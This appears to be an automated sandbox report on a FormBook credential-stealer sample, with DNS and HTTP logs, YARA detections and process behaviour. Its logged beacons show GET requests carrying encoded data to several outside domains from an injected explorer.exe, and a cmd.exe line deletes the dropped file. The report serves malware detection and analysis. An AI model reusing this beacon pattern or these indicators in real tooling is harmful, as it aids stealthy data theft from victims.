Nov 25, 2021 17:50:17.490470886 CET | 8.8.8.8 | 192.168.2.4 | 0x8757 | No error (0) | www.intelldat.com | intelldat.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:17.490470886 CET | 8.8.8.8 | 192.168.2.4 | 0x8757 | No error (0) | intelldat.com | | 143.95.80.65 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET | 8.8.8.8 | 192.168.2.4 | 0x8462 | No error (0) | www.helpfromjames.com | helpfromjames.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:22.867161989 CET | 8.8.8.8 | 192.168.2.4 | 0x8462 | No error (0) | helpfromjames.com | | 185.65.236.168 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET | 8.8.8.8 | 192.168.2.4 | 0xff5e | No error (0) | www.helpfromjames.com | helpfromjames.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:44.630163908 CET | 8.8.8.8 | 192.168.2.4 | 0xff5e | No error (0) | helpfromjames.com | | 185.65.236.168 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET | 8.8.8.8 | 192.168.2.4 | 0xa78c | No error (0) | www.dandftrading.com | wss.easycompanies.com.au | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:50:49.302557945 CET | 8.8.8.8 | 192.168.2.4 | 0xa78c | No error (0) | wss.easycompanies.com.au | | 13.210.99.21 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET | 8.8.8.8 | 192.168.2.4 | 0xb4d0 | No error (0) | www.bestinvest-4-you.com | | 104.21.31.204 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:50:56.192150116 CET | 8.8.8.8 | 192.168.2.4 | 0xb4d0 | No error (0) | www.bestinvest-4-you.com | | 172.67.179.242 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:51:01.443115950 CET | 8.8.8.8 | 192.168.2.4 | 0x51f4 | No error (0) | www.weprepareamerica-planet.com | | 208.91.197.27 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.yesrecompensas.lat
                                              • www.gadget198.xyz
                                              • www.le-hameau-enchanteur.com
                                              • www.henleygirlscricket.com
                                              • www.webartsolution.net
                                              • www.blttsperma.quest
                                              • www.intelldat.com

                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49781 | 3.96.23.237 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:49:40.756764889 CET | 6722 | OUT | GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.yesrecompensas.lat
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Nov 25, 2021 17:49:40.862773895 CET | 6722 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 16:49:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 89
                                              Connection: close
                                              X-date: 2021-11-23T23:37:01+00:00
                                              Expires: Tue, 30 Nov 2021 23:37:01 +0000
                                              Cache-Control: public, max-age=604800
                                              Location: http://yesrecompensas.com.mx
                                              X-Xss-Protection: 1; mode=block
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              X-Cached: HIT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 79 65 73 72 65 63 6f 6d 70 65 6e 73 61 73 2e 63 6f 6d 2e 6d 78 27 22 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><body onload="document.location.href='http://yesrecompensas.com.mx'"></body></html>


                                               Session ID: 1
                                               Source IP: 192.168.2.4
                                               Source Port: 49783
                                               Destination IP: 172.67.158.42
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:49:45.949994087 CET
                                               kBytes transferred: 7577
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.gadget198.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:49:45.980499029 CET
                                               kBytes transferred: 7578
                                               Direction: IN
                                               Data: HTTP/1.1 301 Moved Permanently
                                              Date: Thu, 25 Nov 2021 16:49:45 GMT
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Thu, 25 Nov 2021 17:49:45 GMT
                                              Location: https://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=693LmV%2Bw32mJLpz0CjLHpA9CmAqDZ3cBnMrgJPBsLZg3VlXc5o0F7BW0NUSneKFXoV86CV%2FB1SSCUpaP71S1BwtoQ1W6xgQpIeSLasN96ZbuxmIXWd023SoZO7OzNb6p00iwFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6b3c5f464ee52488-FRA
                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                               Session ID: 2
                                               Source IP: 192.168.2.4
                                               Source Port: 49784
                                               Destination IP: 213.186.33.5
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:49:51.119391918 CET
                                               kBytes transferred: 7579
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.le-hameau-enchanteur.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:49:51.146656990 CET
                                               kBytes transferred: 7580
                                               Direction: IN
                                               Data: HTTP/1.1 302 Moved Temporarily
                                              server: nginx
                                              date: Thu, 25 Nov 2021 16:49:51 GMT
                                              content-type: text/html
                                              content-length: 138
                                              location: http://www.le-hameau-enchanteur.com
                                              x-iplb-request-id: 5411343F:C278_D5BA2105:0050_619FBEAF_1984DF61:1C785
                                              x-iplb-instance: 16980
                                              set-cookie: SERVERID77446=200173|YZ++s|YZ++s; path=/; HttpOnly
                                              connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                               Session ID: 3
                                               Source IP: 192.168.2.4
                                               Source Port: 49785
                                               Destination IP: 151.139.128.11
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:49:56.399925947 CET
                                               kBytes transferred: 7581
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.henleygirlscricket.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:49:56.444983959 CET
                                               kBytes transferred: 7582
                                               Direction: IN
                                               Data: HTTP/1.1 200 OK
                                              Date: Thu, 25 Nov 2021 16:49:56 GMT
                                              Cache-Control: no-store, no-cache, max-age=0, must-revalidate, private, max-stale=0, post-check=0, pre-check=0
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Set-Cookie: SPSI=f9ebd8c7b9ab11e4eabd2cfd107b74f6; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: SPSE=jB5wJrLCb5L3BCZV1tOG+b6YamHO2pIF5C6Yl5YG8SpYlBnGa8pQ668eabPu/dm7tdPEIiCzYkZ5CkO7l5whMA==; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: spcsrf=b9a5b2e19df40b785f85ce4477824e3c; path=/; SameSite=Strict; HttpOnly; expires=Thu, 25-Nov-21 18:49:56 GMT
                                              Set-Cookie: adOtr=obsvl; path=/; SameSite=Lax; expires=Thu, 2 Aug 2001 20:47:11 UTC
                                              Set-Cookie: UTGv2=D-h4a7d56b29c1428a99096986a481fb2c3e64; path=/; SameSite=Lax; expires=Tue, 24-May-22 16:49:56 GMT
                                              Server: fbs
                                              X-Accel-Expires: 0
                                              X-HW: 1637858996.cds084.am5.h2,1637858996.cds007.am5.sc,1637858996.cdn2-wafbe02-ams1.stackpath.systems.-.w,1637858996.cds007.am5.p
                                              Access-Control-Allow-Origin: *
                                              Connection: close


                                               Session ID: 4
                                               Source IP: 192.168.2.4
                                               Source Port: 49798
                                               Destination IP: 198.54.125.56
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:50:01.748836994 CET
                                               kBytes transferred: 7906
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.webartsolution.net
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:50:01.915517092 CET
                                               kBytes transferred: 7909
                                               Direction: IN
                                               Data: HTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Thu, 25 Nov 2021 16:50:01 GMT
                                              server: LiteSpeed
                                              location: https://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz
                                              x-turbo-charged-by: LiteSpeed
                                              connection: close
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                               Session ID: 5
                                               Source IP: 192.168.2.4
                                               Source Port: 49820
                                               Destination IP: 37.123.118.150
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:50:07.020860910 CET
                                               kBytes transferred: 8384
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.blttsperma.quest
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:50:07.050486088 CET
                                               kBytes transferred: 8385
                                               Direction: IN
                                               Data: HTTP/1.1 403 Forbidden
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Thu, 25 Nov 2021 16:50:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 178
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                               Session ID: 6
                                               Source IP: 192.168.2.4
                                               Source Port: 49824
                                               Destination IP: 143.95.80.65
                                               Destination Port: 80
                                               Process: C:\Windows\explorer.exe

                                               Timestamp: Nov 25, 2021 17:50:17.640515089 CET
                                               kBytes transferred: 8395
                                               Direction: OUT
                                               Data: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.intelldat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Timestamp: Nov 25, 2021 17:50:17.792484999 CET
                                               kBytes transferred: 8396
                                               Direction: IN
                                               Data: HTTP/1.1 500 Internal Server Error
                                              Date: Thu, 25 Nov 2021 16:50:17 GMT
                                              Server: Apache
                                              Content-Length: 7309
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:17:48:22
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:17:48:24
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:17:48:28
                                              Start date:25/11/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:17:48:52
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                              Imagebase:0xef0000
                                              File size:851968 bytes
                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:17:48:53
Start date:25/11/2021
Path:C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:0xea0000
File size:32768 bytes
MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate

General

Start time:17:48:57
Start date:25/11/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:17:48:59
Start date:25/11/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis